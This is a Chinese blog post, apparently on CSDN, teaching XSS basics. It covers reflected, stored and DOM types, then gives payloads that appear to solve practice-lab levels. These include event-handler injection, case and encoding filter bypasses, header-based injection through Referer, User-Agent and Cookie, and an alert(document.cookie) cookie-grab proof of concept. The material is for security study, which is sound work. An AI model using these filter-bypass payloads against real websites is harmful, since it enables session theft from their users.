Xss基础

最新推荐文章于 2025-04-14 11:22:10 发布
最新推荐文章于 2025-04-14 11:22:10 发布
阅读量490 收藏 2
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_62693307/article/details/129181449
版权

Xss基础

概念(跨站脚本攻击)

利用网页开发时留下的漏洞,通过注入恶意指令代码到网页,从而对用户进行攻击

Xss和sql的区别

  • Xss和sql注入攻击的指令都是由黑客通过用户输入域注入的,但xss注入的是html,而sql注入的是sql命令

  • Xss和sql注入都利用了web服务器没有对用户输入数据进行严格的检查和有效过滤的缺陷

  • Xss攻击盗取web终端用户的敏感数据,甚至控制用户终端操作;sql注入攻击盗取web后台数据库中的敏感数据,甚至控制整个数据库服务器

Xss类型

反射型xss

存储型xss

DOM型xss

xss类型之间的区别

攻击对象

解析位置

存储时间

输入点

反射型xss

需要自己取找寻攻击对象,向攻击对象发送特定的url,并且被攻击者要点进链接后,才能进行攻击,所以攻击范围不是很广

浏览器

只能即使即用,没有持久性

(必须要被攻击用户点击特定的url才可以进行攻击)

一般在搜索框或者页面跳转这些地方

存储型xss

通过广撒网或者其它指定的方式,将存储型xss放在具有xss漏洞的网站上,只要有用户去点击,即可进行攻击,也可以自己去找寻攻击对象,所以攻击范围更广

服务器

可以存储进服务器(只要服务器中有存储型xss就可以进行攻击)

一般在留言或者用户存储的地方

DOM型xss

(DOM反射型xss)

攻击方式和反射型xss差不多,都是向攻击对象发送url

浏览器

是在DOM位置上,不取决于输入环境上

反射型xss漏洞的查找

直接查看网页的url里面是否存在参数,有参数存在则存在反射型xss

存储型xss漏洞的查找

直接在留言框或可以输入输出的地方输入要注入的代码

DOM型xss漏洞(反射型DOM)

该类型xss是不需要经过后端,直接在服务器前端js渲染即可完成反射型DOMxss,前端js渲染过程在赋值处理中造成闭合形成一个新的标签再次解析,从而导致DOM型xss的形成

Xss辅助测试工具

Beef

Xss’or

IE Tester

有些网页利用了转义字符(keyword和value)

Keyword的闭合方式是双引号

Value的闭合方式有两种:单引号和双引号

如何判断value使用的是单引号还是双引号的方法:

输入’“>三个字符测试闭合,查看文本框内的内容

文本框无内容就是单引号,有内容为且内容为’即为双引号

Xss一般的攻击代码如下

<script>alert(‘yes’);</script>

<script>alert(document.cookie);</script> 获取cookie

Onfocus=javascript:alert(‘xss’)>

‘Onfocus=’alert(123) 当用户输入时才运行的脚本

无过滤机制

<script>alert(‘111’)</script>

新建标签(当发现常规的被过滤掉时所采用)

"><a href=javascript:alert(1)>xss</a>

单引号+事件响应

'οnclick='alert(111)

双引号+事件响应

“οnclick=“alert(111)

超链接

“><ahref=’javascript:alert(1)’>tjy</a>

大小写绕过(也可以用其他的代码,只要里面含有大写就可以实现大小写绕过)

“ONclick=’javascript:alert(1)

“><aHref=’javascript:alert(1)>xss</a>

双写绕过(找到被过滤的代码,写两份,其中一份包含在写好的一份中,这样就可以实现双写绕过)

编码绕过(当发现常用的代码直接写入html中,没有任何反应时,可以猜想一下是否为编码绕过,这里需要用到工具,这里必须要用到伪协议)

HTML字符实体转换,网页字符实体编码 (qqxiuzi.cn) (这是工具网址)

使用伪协议:javascript:alert(1),将ri使用工具转化成&#114;&#105;

javasc&#114;&#105;pt:alert(1)

检测关键字(还是和编码绕过一样,但后台源码中加入了其他的东西,例如strpos函数,这个意思是输入的字符串里面必须要有某些特定的字符(http://)而我们可以把它加上在注释掉就行了)

javasc&#114;&#105;pt:alert(1)//http://

隐藏的信息(这里会有几个参数,而我们则要判断出哪个参数可以时我们自己传参的,然后通过更改参数重而达到自己的目的)

1&t_sort=1"οnclick='javascript:alert(1)' type=button >//

Type=button 将其转化成输入框,从而和Onclick结合

1&t_sort=1" οnclick=‘javascript:alert(1)’ type=button >//

referer信息(这个关卡需要用到抓包工具,需要修改referer的值)

Referer:1"οnclick='javascript:alert(1)'type=button >//

User-agent信息(这个关卡需要用到抓包工具,需要修改user-agent的值)

User-Agent:1"οnclick='javascript:alert(1)' type=button > //

Cookie信息(这个关卡需要用到抓包工具,需要修改cookie的值)

Cookie:1" οnclick='javascript:alert(1)' type=text > //

Exif xss(这种类似于上传文件的漏洞)

Exif是可交换图像文件格式,是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。

这里是将xss写到exif里,exif是PSP扩展,如果要用exif_read_data函数记得开启扩展

一下是xss代码

<?php

$exif = exif_read_data(‘test.jpg);

Var_dump($exif);

?>

Ng-include属性(没太看懂,但可以使用新标签去解)

<ahref=”javascript:alert(1)”>xss</a>’

或者

<img src=1οnerrοr=alert(1)>’

空格实体转义

使用URL编码将回车符转换为%0d(或换行符%0a)替代即可。

<img%0dsrc=1%0dοnerrοr=alert(1)>

参数拼接-1(这里有个swf文件没有被加载出来,swf文件:即shockwave flash文件,能被flash player打开)

?arg01=onmouseover&arg02=alert(1)

或者

?arg01=a&arg02=bοnmοuseοver=alert(1)

参数拼接-2

?arg01=onmouseover&arg02=alert(1)

或者

?arg01=a&arg02=bοnmοuseοver=alert(1)

孤寂204
关注
xss基础,进阶和触发
weiliang369的博客
02-23 449
了解XSS的作用↓ 盗取cookie(直接登录管理员后台) 如何判断存在XSS↓ 弹窗测试payload <script>alert('xss')</script> //< script > 开始js语句 //< /script > 结束js语句 Alert('内容') //js的弹窗语句 HTML中标记通常是成对出现。 常用语句 <script>alert(xss)</script> 我们输入一个r3bug提交查
CSRF+XSS基础学习
ce666666的博客
01-19 1260
前言 通过靶场学习csrf和xss基础 CSRF原理 跨站请求伪造,利用网站对用户网页浏览器的信任,劫持用户当前已登录的WEB应用程序,执行非用户本意的操作。 存在三个角色User、WebA(存在漏洞的网站)、WebB(黑客攻击) 1.User首先登录并信任WebA,WebA通过用户验证会分发User浏览器一个Cookie。 2.WebB向WebA添加链接方式诱导User访问网站WebB。 3.当User点击链接方式,即WebB利用User的浏览器房屋内WebA,发出操作请求。 4。User的浏览器会带着
搜索框——不能忽视的XSS漏洞—搜索框所引起的XSS漏洞
06-12
我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?有一些代码还显示不出来?这太让我纳闷了,于是问一个学长是怎么一回事,他说:“当然啦,你输出的内容被浏览器解释过后的样子就是这样子的了,比如说你的空格浏览器是不承认的,你要输出空格就得用nbsp; ……”这时我才反应过来:“哦,原来如此……”。那时我才知道,在html的输出上代码和内容还是得程序员自己去区分的。
渗透测试基础-反射型XSS原理及实操
weixin_45488495的博客
04-17 1万+
渗透测试基础-反射型XSS原理及实操XSS是什么漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! XSS是什么 因为人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,将跨站脚本攻击缩写为XSS。这就是XSS名字的由来。XSS攻击是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供
不懂XSS攻击,你的网站分分钟被黑客安排!从零基础到精通,收藏这篇就够了!_el-input输入框会有xss攻击吗
最新发布
yy1715713348的博客
04-14 850
XSS攻击是Web应用程序中常见且危险的攻击方式,就像潜伏在你网站里的“隐形杀手”,随时可能窃取用户数据、篡改网页内容,甚至进行钓鱼诈骗!防御XSS攻击的关键在于对用户输入进行严格的过滤、验证和编码,确保恶意脚本不能在浏览器中执行。记住,“预防胜于治疗”,只有做好充分的防御措施,才能让你的网站远离XSS攻击的威胁!在PHP中,是防止XSS攻击的常见方法。同时,通过合理的HTTP头部设置和正确的DOM操作方法,可以进一步提高应用的安全性,让你的网站更加坚不可摧!```
跨站脚本攻击漏洞(XSS):基础知识和防御策略
热门推荐
weixin_43263566的博客
01-16 1万+
跨站脚本攻击漏洞-基础
xss相关知识点
weixin_55021949的博客
07-30 420
xss
搜索框反射型xss问题解决(网站开发)
weixin_30567471的博客
01-27 2077
什么是反射型XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等等。利用该漏洞,攻击者可以劫持已通过验证的用户的会话。劫持到已验证的会话后,攻击发起者拥有该授...
网络安全XSS漏洞- XSS基础概述及利用
goldfish8848的博客
06-12 1863
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
xss基础
weixin_54246834的博客
07-27 617
XSS:跨站脚本(Cross-site scripting,通常简称为XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。XSS是由于Web应用程序对用户的输入过滤不足而产生的,攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者用户可能采取Cookie窃取、会话劫持、钓鱼欺骗等各种攻击。这类攻击通常包含了HTML以及用户端脚本语言用户提交的数据中可以构造代码来执行,从而实现窃
MYSQL与SQL注入和XSS基础
weixin_65695770的博客
04-07 4023
MYSQL与SQL注入 mysql知识点- 基本查询语句 查询表中全部信息: select *from 表明-关键的函数 select+以下语句 version() 数据库版本 database() 数据库名 user() 用户名 current_user() 当前用户名 system_user() 系统用户名 @@datadir 数据库路径 @@version_compile_os 操作系统...
谷歌搜索框XSS漫谈.pdf
08-03
网络资源:谷歌搜索框XSS漫谈前几天看了谷歌搜索框XSS,有一个视频讲的非常好 https://www.youtube.com/watch?v=gVrdE6g_fa8,这个视 频不仅讲了该漏洞的原理,同时还说了mk如何来研究这个漏洞,以及告诉你一些挖掘此类漏洞的技巧。 这个漏洞的关键就是parser bug与差异。
XSS -- 三种基本漏洞 (浅谈)
thj_blog
11-13 7376
一、  XSS 漏洞的验证         我们可以用一段简单的代码,验证和检测漏洞的存在,这样的代码叫做PoC(Proof of Concept)。验证XSS 漏洞存在的PoC 如下:               (1)&lt;script&gt;alert(/xss/)&lt;/script&gt;                      (2)&lt;script&gt;confirm('...
42. 记一次搜索框历史记录中的XSS
__Qian的博客
03-23 1361
1.这里的XSS存在于历史记录中,首先在搜索框中输入xss语句:<input value="" οnclick=alert(‘xss’) type=“text”>,但是新打开链接后,页面载入出错 2.返回查看搜索记录,点击搜索记录的搜索框,即可弹窗 注:这里使用其他的语句也可弹窗: <input name="name" value="" onmouseover=promp...
XSS注入——反射性XSS
wwwwyyyrre的博客
06-15 2582
所以就可以利用这个函数来构造payload,也是最简单的xss脚本语言:这样就可以绕过了 没有任何的限制 就是一个简单的反射型xss注入等明天搭一个本地的靶场来做xss-labs我认为不是很难,反射型xss
XSS攻击详解
xllllll___的博客
02-17 2656
1.盗用cookie,获取用户的敏感信息;2.利用iframe,frame等方式,以用户的身份执行一些管理动作,或者执行一些一般的行为比如说发私信,加好友等;3.在一些访问量极大的页面上进行XSS攻击可以攻击一些小型网站;4.利用一些可被攻击的域或者其它的域信任的特点,以受信任来源的身份请求一些平时不被允许的操作。
XSS(跨站脚本攻击)漏洞理解
向上的"狼"的博客
07-16 2482
XSS(跨站脚本攻击)漏洞理解
mysql搜索型注入_pikachu-搜索型注入 #手工注入
weixin_28745525的博客
02-28 405
1.搜索型注入漏洞产生的原因:在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索型注入漏洞,又称文本框注入。2.搜索型注入的类型:同其他注入类型相同,由于提交表单的不同,可分为GET型(多出现于网站上的搜索)和POST型(多出现于用户名的登录搜索匹配),搜索型注入是国内系统中普遍存在的漏洞。3.原理分析:select us...
XSS:漏洞的检测与防御
我乐了的博客
01-30 2156
如果在官方修复前,那个 XSS 漏洞已经被恶意利用了,那即使已经通过输入检查方法修复了,被插入的恶意代码仍会存在,这可以认为是修复不彻底的表现。PhantomJS:已停止维护。DOM XSS 的扫描相比常规 XSS 要难一些,主要是针对 JS 代码的分析,如果只是简单的正则匹配,就很容易误报漏报。不同的语言有不同的特性,在源码审计时需要采取不同的检测点,但有一个共同的思路,那就是。有时我们也会反着来:先查看一些危险的输出函数,再回溯它的参数传递,判断是否有未经过滤的用户输入数据,若有就代表可能存在漏洞。
渗透测试 ,XSS基础知识
07-23
XSS(Cross-Site Scripting)是一种常见的网站安全漏洞,攻击者通过在网页中注入恶意脚本来攻击用户。以下是关于 XSS基础知识: 1. XSS 的原理:XSS 攻击利用了网站对用户输入的信任,攻击者将恶意脚本注入到网页中,当用户浏览该网页时,恶意脚本会在用户的浏览器中执行,从而达到攻击的目的。 2. XSS 的分类:XSS 可以分为三种主要类型:存储型(Stored XSS)、反射型(Reflected XSS)和 DOM 型(DOM-based XSS)。存储型 XSS 注入的恶意脚本被存储在目标网站的数据库中,当其他用户访问该页面时,恶意脚本会被执行。反射型 XSS 注入的恶意脚本通过 URL 参数传递给目标网站,目标网站在返回的页面中直接输出了这些恶意脚本,用户点击链接时脚本被执行。DOM 型 XSS 则是利用了网页的 DOM 结构,通过修改 DOM 中的内容来触发漏洞。 3. XSS 的危害:XSS 攻击可以导致许多危害,包括盗取用户的敏感信息(如用户名、密码、cookie)、篡改网页内容、进行钓鱼攻击、传播恶意软件等。 4. 防御 XSS 的措施:为了防止 XSS 攻击,可以采取以下措施: - 输入验证和过滤:对用户输入的数据进行验证和过滤,过滤掉不可信的字符和脚本。 - 输出转义:将用户输入的数据进行转义,确保输出到网页时不会被浏览器解析为可执行的脚本。 - 使用 HTTP 头部中的 Content Security Policy(CSP)来限制网页的资源加载和执行。 - 设置 HttpOnly 属性来限制 JavaScript 对 cookie 的访问。 - 定期更新和修复网站的漏洞,以防止攻击者利用已知的 XSS 漏洞。 以上是关于 XSS基础知识,深入了解 XSS 攻击的原理和防御措施对于网站安全至关重要。在进行渗透测试时,理解 XSS 的工作原理和常见漏洞场景可以帮助你更好地发现和利用 XSS 漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值